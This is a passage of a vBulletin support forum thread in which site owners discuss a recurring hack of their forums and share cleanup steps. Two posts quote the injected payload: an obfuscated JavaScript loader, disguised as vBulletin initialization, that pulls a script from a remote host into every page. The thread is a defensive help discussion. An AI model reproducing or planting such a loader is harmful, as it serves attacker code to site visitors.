A fix if your site is already exploited

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • ZeroHour
    Senior Member
    • Sep 2007
    • 167

    #16
    Originally posted by Jaxo
    Ok, It appears you are correct,. I removed the skin and reinstalled and its clean// Thank you

    I notice original post is from 2009,.. still no proper fix for this?
    You need to find your apache access logs. They give a lot of clue to whats going on and if they can still get in. Change account passwords as well.

    Comment

    • Jaxo
      Member
      • Dec 2011
      • 36

      #17
      Thanks zerohour, I appreciate the help m8.

      Comment

      • Jaxo
        Member
        • Dec 2011
        • 36

        #18
        anything in particular I should be looking for?

        Comment

        • Kensino
          Senior Member
          • Sep 2007
          • 609
          • 3.8.x

          #19
          Originally posted by Jaxo
          Ok, It appears you are correct,. I removed the skin and reinstalled and its clean// Thank you

          I notice original post is from 2009,.. still no proper fix for this?
          uhhh... the original post is from yesterday.. what are you talking about 2009? Please go back and read again.

          Yesterday, 2:03am

          Comment

          • ZeroHour
            Senior Member
            • Sep 2007
            • 167

            #20
            Originally posted by Jaxo
            anything in particular I should be looking for?
            Tbh although others have said it wont help a screenshot or list of addons might point out a recently hacked one.

            Comment

            • Diablotic
              Member
              • Feb 2010
              • 83

              #21
              This is mad, I have excatly the same issue for few days now and have no idea what is causing it. Please help.
              http://angliki.info

              Comment

              • tagthis
                New Member
                • May 2006
                • 13

                #22
                Originally posted by Diablotic
                This is mad, I have excatly the same issue for few days now and have no idea what is causing it. Please help.
                Open your footer template in the style you're using and then click save and close. This rebuilds the file and removes the exploit. This is however just a work around to remove it and doesn't fix the root cause.

                +1 for the same exploit.

                VB - any word on finding how they're doing this?

                We're running VB/CMS 4.1.8 + vbSEO 3.6.0 and that's about it.

                Comment

                • Diablotic
                  Member
                  • Feb 2010
                  • 83

                  #23
                  I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

                  I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
                  http://angliki.info

                  Comment

                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73979

                    #24
                    Originally posted by tagthis
                    VB - any word on finding how they're doing this?
                    Nope... Not enough information given, no access to any of the sites with this issue. There is a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well but most people don't even save those for more than 24 hours.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API

                    Comment

                    • tagthis
                      New Member
                      • May 2006
                      • 13

                      #25
                      Originally posted by Diablotic
                      I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

                      I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
                      Let us know how it goes. I've looked at the fix and for some reason i don't have a
                      /vbseo/includes/functions_vbseocp_abstract.php

                      file. So i can't apply it. Also the link to their testing utility (v3) isn't working by the looks of it.

                      Wayne, i'll open a support ticket if it comes back again.

                      Comment

                      • CountRock
                        New Member
                        • Jul 2011
                        • 5
                        • 4.1.x

                        #26
                        Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However still getting this following Java script in the footer file. Re-building the footer by saving it didnt work. What can I do?

                        Code:
                        [TABLE]
                        [TR]
                        [TD="class: webkit-line-content"]	<script type="text/javascript">[/TD]
                        [/TR]
                        [TR]
                        [TD="class: webkit-line-number"][/TD]
                        [TD="class: webkit-line-content"]	<!--[/TD]
                        [/TR]
                        [TR]
                        [TD="class: webkit-line-number"][/TD]
                        [TD="class: webkit-line-content"]		// Main vBulletin Javascript Initialization[/TD]
                        [/TR]
                        [TR]
                        [TD="class: webkit-line-number"][/TD]
                        [TD="class: webkit-line-content"]		var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();[/TD]
                        [/TR]
                        [TR]
                        [TD="class: webkit-line-number"][/TD]
                        [TD="class: webkit-line-content"]	//-->[/TD]
                        [/TR]
                        [TR]
                        [TD="class: webkit-line-number"][/TD]
                        [TD="class: webkit-line-content"]	</script>[/TD]
                        [/TR]
                        [/TABLE]

                        Comment

                        • Mr Jolly
                          Member
                          • Feb 2008
                          • 93
                          • 3.6.x

                          #27
                          Originally posted by Wayne Luke
                          Nope... Not enough information given, no access to any of the sites with this issue. There is a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well but most people don't even save those for more than 24 hours.
                          I opened a ticket and was asked to pay $80 before you'd look at it. Then I was directed to the forums.

                          I did pay $100 for the publishing suite upgrade so I could get support for this, but no one replied to my ticket and fortunately this thread was posted and the problem was solved.

                          I gave vBulletin full access to my server, all the passwords they could possibly need.

                          Comment

                          • Mr Jolly
                            Member
                            • Feb 2008
                            • 93
                            • 3.6.x

                            #28
                            Originally posted by CountRock
                            Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However still getting this following Java script in the footer file. Re-building the footer by saving it didnt work. What can I do?

                            Code:
                            [TABLE]
                            [TR]
                            [TD="class: webkit-line-content"]    <script type="text/javascript">[/TD]
                            [/TR]
                            [TR]
                            [TD="class: webkit-line-number"][/TD]
                            [TD="class: webkit-line-content"]    <!--[/TD]
                            [/TR]
                            [TR]
                            [TD="class: webkit-line-number"][/TD]
                            [TD="class: webkit-line-content"]        // Main vBulletin Javascript Initialization[/TD]
                            [/TR]
                            [TR]
                            [TD="class: webkit-line-number"][/TD]
                            [TD="class: webkit-line-content"]        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();[/TD]
                            [/TR]
                            [TR]
                            [TD="class: webkit-line-number"][/TD]
                            [TD="class: webkit-line-content"]    //-->[/TD]
                            [/TR]
                            [TR]
                            [TD="class: webkit-line-number"][/TD]
                            [TD="class: webkit-line-content"]    </script>[/TD]
                            [/TR]
                            [/TABLE]
                            If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.

                            Comment

                            • CountRock
                              New Member
                              • Jul 2011
                              • 5
                              • 4.1.x

                              #29
                              Originally posted by Mr Jolly
                              If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.
                              Did what the 1st post said! fixed for the time being.

                              Comment

                              • dadoc
                                Member
                                • Mar 2008
                                • 82

                                #30
                                Hello,

                                I know that this problem has effected most versions of vBulletin
                                You guys are talking about the 4x version but it all sounds very similar to what happened to my forum

                                I am old 3x version and I am not here to tell you what the problem is or how to fix it, but

                                I have been in battle with a crazy redirect which has been on for about 2 weeks,

                                It is hard to read through all the forums and see what others have said to do and because it is a ongoing problem
                                there are little updated fixes

                                I dont know if the problem is vBulletin or vbseo (which I have installed latest version)

                                what fixed my problem was

                                1. doing a full re instal of vbseo all files

                                2. changed passwords to everything eg. forumcp database cpannel vbseocp and others (make sure to edit config for new passwords)

                                3. changing permissions to all config files forum and vbseo I had done this via ftp but after much trial and error found that this had to be done via cpanel - file manager dont know why just worked!

                                4. I could not get my warning message in my vbseocp to change until I did the permission change for the config file via cpanel (the message was saying that you should edit your config permissions to securer your site) once I did it removed the message.


                                I hope this may help someone, and I am still looking into some changes that have been mate to my database
                                extra tables were added, related to tags, I dont know much about these tables other than I did not create them and they were created
                                about the same time as I started to have problems.

                                You can have a look at a screen shot here if you want to see them



                                Like I said I have no answers and dont know the cause, but this worked for me

                                Regards
                                Ryan
                                Crime case files

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...